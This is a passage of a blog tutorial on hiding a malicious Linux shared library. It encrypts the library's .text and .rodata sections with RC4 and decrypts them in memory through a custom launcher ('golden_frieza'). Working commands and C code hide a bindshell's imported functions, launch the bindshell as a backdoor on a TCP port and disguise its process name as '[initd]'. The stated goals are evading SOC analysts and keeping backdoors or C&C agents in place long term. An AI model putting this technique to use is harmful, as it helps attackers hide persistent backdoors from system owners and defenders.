The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the beginning of testalo_mod.so) and its size is 0x100 (256 bytes). What if we fill up this space with zeros and then try to programmatically load the library? Will it be mapped into our process memory, or will the interpreter have something to complain about? As the encryption procedure turns the binary instructions into garbage, filling up the “.text” section of our module with zeros simulates that condition without having to actually encrypt the binary yet. We can do that by executing the command:

$ dd if=/dev/zero of=testalo_mod.so seek=1408 bs=1 count=256 conv=notrunc

…and then verifying with “xxd” that the “.text” section has indeed been entirely zeroed:

$ xxd testalo_mod.so
[...]
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]

To observe the behavior we are interested in, we need an application (see the code snippet of “dlopen_test.c” below) that tries to map the “testalo_mod.so” module into its address space (line 12) and then, in case of success, checks whether at runtime the function “testalo()” gets resolved (line 18) and executed (line 23).
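
The original “dlopen_test.c” was shown as an image; the sketch below is a reconstruction. The line numbers cited in the text (12, 18 and 23) refer to the original listing, so here the corresponding calls are simply marked with comments.

/* dlopen_test.c - reconstruction of the original listing */
#include <stdio.h>
#include <dlfcn.h>

int main(void)
{
    void (*testalo)(void);

    /* "line 12": map testalo_mod.so into our address space */
    void *handle = dlopen("./testalo_mod.so", RTLD_LAZY);
    if (handle == NULL) {
        fprintf(stderr, "dlopen: %s\n", dlerror());
        return 1;
    }

    /* "line 18": resolve the exported testalo symbol at runtime */
    testalo = (void (*)(void)) dlsym(handle, "testalo");
    if (testalo == NULL) {
        fprintf(stderr, "dlsym: %s\n", dlerror());
        return 1;
    }

    /* "line 23": transfer execution to testalo() */
    testalo();

    dlclose(handle);
    return 0;
}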

Let’s compile and execute it:

$ gcc dlopen_test.c -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)

What we are observing here is that the program crashes during the execution of line 12. Why? This happens because, even though the call to “dlopen()” in our application does not explicitly invoke anything from “testalo_mod.so”, there are functions inside “testalo_mod.so” itself that are automatically called (such as “frame_dummy()”) during the module initialization process. A “gdb” session will help here.

$ objdump -M intel -d testalo_mod.so

Because such functions are all zeroed, a segmentation fault is produced when the execution flow is transferred to them.

What if we only encrypted the content of the “testalo()” function, in which our logic resides? To do that we just recompile “testalo_mod.so” and determine the size of the function’s code with the command “objdump -M intel -d testalo_mod.so“, by observing where the function starts and where it ends:

The formula to calculate our value is 0x680 - 0x65a = 0x26 = 38 bytes.

Finally we overwrite the library “testalo_mod.so” with 38 bytes of zeros, starting from where the “testalo()” function is located, which this time is at offset 0x65a = 1626 bytes from the beginning of the file:

$ dd if=/dev/zero of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

Then we can launch “dlopen_test” again:

$ ./dlopen_test
Segmentation fault (core dumped)

It seems nothing has changed. But a closer look will reveal the segfault has occurred for another reason this time:

Previously we got stuck at line 12 in “dlopen_test.c”, during the initialization of the “testalo_mod.so” dynamic library. Now instead we get stuck at line 23, when “testalo_mod.so” has been properly mapped into our process memory, the “testalo()” symbol has already been resolved from it (line 18) and the function is finally invoked (line 23), which in turn causes the crash. Of course, the binary instructions are invalid because we zeroed that block of memory earlier. However, if we had really put encrypted instructions there and decrypted them all before the invocation of “testalo()“, everything would have worked smoothly.

So, we know now what to encrypt and how to encrypt it: only the exported functions holding our malicious payload or application logic, not the whole text section.

Next step: a first prototype for the project

Let’s see a practical example of how to decrypt in memory our encrypted payload. We said at the beginning that two components are needed in our implementation:

  • (a) an ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • (b) the launcher, a program that takes the ELF dynamic library as input, decrypts it in memory by means of a crypto key and then executes it.

Regarding point (a), we will continue to use “testalo_mod.so” for now, encrypting the content of the “testalo()” function only. Instead of writing a specific program for that, we can just take advantage of existing tools such as “dd” and “openssl”:

$ dd if=./testalo_mod.so of=./text_section.txt skip=1626 bs=1 count=38

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

The first command basically extracts the 38 bytes composing the binary instructions of “testalo()”. The second command encrypts these with the RC4 key “AAAAAAAAAAAAAAAA” (hex representation -> “41414141414141414141414141414141”) and the third command writes the encrypted content back to the place where “testalo()” is located in the binary. If we now observe the code of that function with the command “objdump -M intel -d ./testalo_mod.so“, it is indeed unintelligible:

The second needed component is the launcher (b). Let’s analyze its C code piece by piece. First it acquires, in hexadecimal format, the offset at which our encrypted function is located (information that we retrieve with “readelf”) and its length in bytes (line 102). Then the terminal echo is disabled (lines 116-125) to allow the user to safely type in the crypto key (line 128), and finally the terminal is restored to its original state (lines 131-135).

Now we have the offset of our encrypted function, but we do not yet know the full memory address where it is mapped. This is determined by looking at “/proc/PID/maps”, as in the code snippet below.
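
The snippet itself was shown as an image; a minimal reconstruction of the idea could look like the function below (function and variable names are illustrative).

/* Scan /proc/<pid>/maps for the executable mapping of the module and return
   its start address (e.g. the 7feb51c56000 seen in the output further down). */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>

uintptr_t find_module_base(pid_t pid, const char *modname)
{
    char path[64], line[512];
    unsigned long start = 0, end = 0;

    snprintf(path, sizeof(path), "/proc/%d/maps", pid);
    FILE *fp = fopen(path, "r");
    if (fp == NULL)
        return 0;

    while (fgets(line, sizeof(line), fp) != NULL) {
        /* keep only the r-xp line belonging to our module */
        if (strstr(line, modname) != NULL && strstr(line, "r-xp") != NULL) {
            sscanf(line, "%lx-%lx", &start, &end);
            break;
        }
    }
    fclose(fp);
    return (uintptr_t)start;
}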

Then all the pieces are in place to extract the encrypted binary instructions from memory (line 199), decrypt everything with the RC4 key collected previously and write the output back to the location where the “testalo()” function’s content lives (line 213). However, we could not do that without first marking that page of memory as writable (lines 206-210) and then making it readable/executable only again (lines 218-222) after the decrypted payload has been written into it. This is because, in order to protect the executable code against tampering at runtime, the interpreter loads it into a non-writable memory region. After use, the crypto key is also wiped from memory (line 214).

Now the address of the decrypted “testalo()” function can be resolved (line 228) and the binary instructions it contains can be executed (line 234).
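
To tie the steps above together, here is a simplified sketch of that core decrypt-and-run sequence. It is not the original launcher source (which is linked just below); it assumes the rc4() routine sketched earlier and a handle previously returned by dlopen() on the module.

/* Sketch: flip the page protections, decrypt the function body in place,
   restore r-x and finally resolve and call testalo(). */
#include <stdint.h>
#include <stddef.h>
#include <sys/mman.h>
#include <dlfcn.h>
#include <unistd.h>

void rc4(const uint8_t *key, size_t keylen, uint8_t *buf, size_t len);  /* as sketched earlier */

int decrypt_and_run(void *handle, uint8_t *base, size_t offset, size_t len,
                    const uint8_t *key, size_t keylen)
{
    uint8_t *target = base + offset;               /* base from /proc/PID/maps, offset from readelf */
    long pagesz = sysconf(_SC_PAGESIZE);
    uint8_t *page = (uint8_t *)((uintptr_t)target & ~((uintptr_t)pagesz - 1));
    size_t span = (size_t)(target - page) + len;

    /* the loader maps .text read+execute only, so make it temporarily writable */
    if (mprotect(page, span, PROT_READ | PROT_WRITE | PROT_EXEC) != 0)
        return -1;

    rc4(key, keylen, target, len);                 /* decrypt the function body in place */

    /* put the original read+execute protection back */
    if (mprotect(page, span, PROT_READ | PROT_EXEC) != 0)
        return -1;

    void (*testalo)(void) = (void (*)(void)) dlsym(handle, "testalo");
    if (testalo == NULL)
        return -1;
    testalo();                                     /* run the now-decrypted payload */
    return 0;
}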

This first version of the launcher’s source code is downloadable from here. Let’s compile it…

$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl

…execute it, and see how it works (user input in bold):

$ ./golden_frieza_launcher_v1 ./testalo_mod.so
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is: testalo_mod.so
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/testalo_mod.so
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000

Execution of .text
==================
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!

As shown at the end of the command output, the in-memory decrypted content of the “testalo()” function is indeed successfully executed.

But…

What is the problem with this approach? Even if our library were stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and “exit()”), which need to be resolved and relocated at runtime, would remain clearly visible. If the binary ended up in the hands of a system administrator or SOC analyst, even with the “.text” section encrypted on the filesystem, simple static analysis tools such as “objdump” and “readelf” would let them infer the purpose of our malicious binary.

Let’s see it with a more concrete example. Instead of using a dummy library, we decide to implement a bindshell (see the code here) and compile that code as an ELF module:

$ gcc testalo_bindshell.c -o testalo_bindshell.so -shared -fPIC

We strip the binary with the “strip” command and encrypt the relevant “.text” portion as explained before. If we now look at the symbol table (“readelf -s testalo_bindshell.so”) or the relocation table (“readelf -r testalo_bindshell.so”), something very similar to the picture below appears:

This clearly reveals the usage of APIs such as “bind()”, “listen()”, “accept()”, “execl()”, etc., which are all functions that a bindshell implementation typically imports. This is inconvenient in our case because it reveals the nature of our code. We need a workaround.

dlopen and dlsym

To get around the problem, the approach we adopt is to resolve external symbols at runtime through “dlopen()” and “dlsym()”.

For example, normally a snippet of code involving a call to “socket()” would look like this:

#include <sys/socket.h>
[...]
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
[...]

When the binary is compiled and linked, the piece of code above is responsible for the creation of an entry for “socket()” in the dynamic symbol and relocation tables. As already said, we want to avoid that. Therefore the piece of code above must be changed as follows:
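
The modified snippet appeared as an image in the original post; reconstructed from the description below, it looks roughly like this:

#include <dlfcn.h>
#include <sys/socket.h>
[...]
int srv_sockfd;
int (*_socket)(int, int, int);            /* same prototype as socket() */
void *handle;
[...]
handle = dlopen(NULL, RTLD_LAZY);         /* NULL -> handle for the main program */
_socket = dlsym(handle, "socket");        /* resolve socket() at runtime */
if ((srv_sockfd = (*_socket)(PF_INET, SOCK_STREAM, 0)) < 0)
[...]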

Here “dlopen()” is invoked only once and “dlsym()” is called for every external function that must be resolved. In practice:

  • “int (*_socket)(int, int, int);” -> we define a function pointer variable having the same prototype as the original “socket()” function.
  • “handle = dlopen(NULL, RTLD_LAZY);” -> “if the first parameter is NULL the returned handle is for the main program”, as stated in the Linux man page.
  • “_socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the address of the “socket()” function, resolved at runtime with “dlsym()”.
  • “(*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of “socket(PF_INET, SOCK_STREAM, 0)”. Basically, the value held by the variable “_socket” is the address of the “socket()” function that has been resolved with “dlsym()”.

These modifications must be repeated for all the external functions “bind()”, “listen()”, “accept()”, “execl()”, etc…

You can see the differences between the two coding styles by comparing the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that the new library is compiled:

$ gcc testalo_bindshell_mod.c -shared -o testalo_bindshell_mod.so -fPIC

…the main effects tied to the change of coding style are the following:

In practice the only external symbols that remain visible now are “dlopen()” and “dlsym()”. No usage of any other socket API or function can be inferred.

Is this enough?

This approach has some issues too. To understand that, let’s have a look at the read-only data section in the ELF dynamic library:

What’s going on? In practice, all the strings we declared in our bindshell module have ended up in clear text inside the “.rodata” section (starting at offset 0xaf5 and ending at offset 0xbb5), which contains all the constant values declared in the C program! Why is this happening? It depends on the way we pass string parameters to the external functions:

_socket = dlsym(handle, "socket");

What we can do to get around the issue is to encrypt the “.rodata” section as well, and decrypt it on-the-fly in memory when needed, as we have already done with the binary instructions in the “.text” section. The new version of the launcher component (golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how it works. First the “.text” section of our bindshell module is encrypted:

$ dd if=./testalo_bindshell_mod.so of=./text_section.txt skip=1738 bs=1 count=1055

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=./testalo_bindshell_mod.so seek=1738 bs=1 count=1055 conv=notrunc

Same thing for the “.rodata” section:

$ dd if=./testalo_bindshell_mod.so of=./rodata_section.txt skip=2805 bs=1 count=193

$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad

$ dd if=./rodata_section.enc of=./testalo_bindshell_mod.so seek=2805 bs=1 count=193 conv=notrunc

Then the launcher is executed. It takes the bindshell module filename (now with both the “.text” and “.rodata” sections encrypted) as a parameter:

$ ./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so

The “.text” section offset and length are passed as hex values (we have already seen how to get those):

Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes

Next, the “.rodata” section offset and length are passed as hex values too. As seen in the last “readelf” screenshot above, in this case the section starts at 0xaf5 and the length is calculated like this: 0xbb5 - 0xaf5 + 1 = 0xc1:

Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes

Then the launcher asks for a command line parameter. Indeed, our bindshell module (specifically the exported “testalo()” function) takes as an input parameter the TCP port it has to listen on. We choose 9000 for this example:

Enter cmdline: 9000
Cmdline is: 9000

The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:

Enter key:

The final part of the output is:

PID is: 3915
Module name is: testalo_bindshell_mod.so
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/testalo_bindshell_mod.so
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000

Execution of .text
==================

This time, below the “Execution of .text” message we get nothing. This is due to the behavior of our bindshell, which does not print anything to standard output. However, the bindshell backdoor has been launched properly in the background:

$ netstat -an | grep 9000
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN

$ telnet localhost 9000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)

Last old-school trick of the day

A fair question is: how does the process show up in the process list after the bindshell backdoor is executed?

$ ps -wuax
[...]
./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so
[...]

Unfortunately, the system owner could identify the process as malicious at first glance! This is not normally an issue when our code runs for a short amount of time. But what if we want to plant a backdoor or C&C agent for a longer period? In that case it would be convenient to mask the process somehow. That is exactly what the piece of code below (implemented in complete form here) does.
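
The listing was shown as an image; one classic way to achieve this effect (not necessarily the exact code of golden_frieza_launcher_v3) is to overwrite the argv[] area and the kernel “comm” name, roughly as sketched here. The helper name and layout are illustrative.

/* Sketch: fake the name that ps displays by rewriting the process cmdline
   and the comm name. */
#include <string.h>
#include <sys/prctl.h>

static void mask_process_name(int argc, char **argv, const char *fake)
{
    /* the argv strings live in one contiguous block: compute its total size */
    size_t avail = (size_t)(argv[argc - 1] + strlen(argv[argc - 1]) - argv[0]);

    memset(argv[0], 0, avail);              /* wipe the original command line */
    strncpy(argv[0], fake, avail - 1);      /* what /proc/<pid>/cmdline (and ps) shows */
    prctl(PR_SET_NAME, fake, 0, 0, 0);      /* what /proc/<pid>/comm shows (15 chars max) */
}

Called early in main() with the desired fake name (e.g. “[initd]”), this is what makes the later ps output lie.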

Let’s first compile the new version of the launcher binary:

$ gcc golden_frieza_launcher_v3.c -o golden_frieza_launcher_v3 -ldl

This time the launcher takes an additional parameter beyond the encrypted dynamic library filename, which is the name we want to assign to the process. In the example below “[initd]” is used:

$ ./golden_frieza_launcher_v3 ./testalo_bindshell_mod.so "[initd]"

Indeed by means of “netstat” we can spot the PID of the process (assuming the bindshell backdoor has started on TCP port 9876):

$ netstat -tupan | grep 9876
tcp 0 0 0.0.0.0:9876 0.0.0.0:* LISTEN 19087

…and from the PID the actual process name:

$ ps -wuax | grep init
user 19087 0.0 0.0 8648 112 pts/5 S 19:56 0:00 [initd]

Well, now you know you should never trust the ps output! 🙂

Conclusion

What if somebody discovers the launcher binary and the encrypted ELF dynamic library on the filesystem? The encryption key is not known, hence nobody can decrypt and execute our payload.

What if the offset and length of the encrypted sections are entered incorrectly? In most cases this will lead to a segfault or illegal instruction and the consequent crash of the launcher component. Again, the code does not leak out.

Can this be done on a Windows machine? Well, if you think about “LoadLibrary()”, “LoadModule()” and “GetProcAddress()”, these API functions do the same as “dlopen()” and “dlsym()”.
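
As a purely illustrative sketch of that Windows analogue (any module and export would do; user32.dll and MessageBoxA are just convenient examples, not part of the golden frieza project):

#include <windows.h>

typedef int (WINAPI *pMessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);

int main(void)
{
    HMODULE h = LoadLibraryA("user32.dll");                              /* counterpart of dlopen() */
    if (h == NULL)
        return 1;

    pMessageBoxA box = (pMessageBoxA) GetProcAddress(h, "MessageBoxA"); /* counterpart of dlsym() */
    if (box != NULL)
        box(NULL, "resolved at runtime", "demo", MB_OK);

    FreeLibrary(h);
    return 0;
}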

That’s all for today!

Snafuz, snafuz!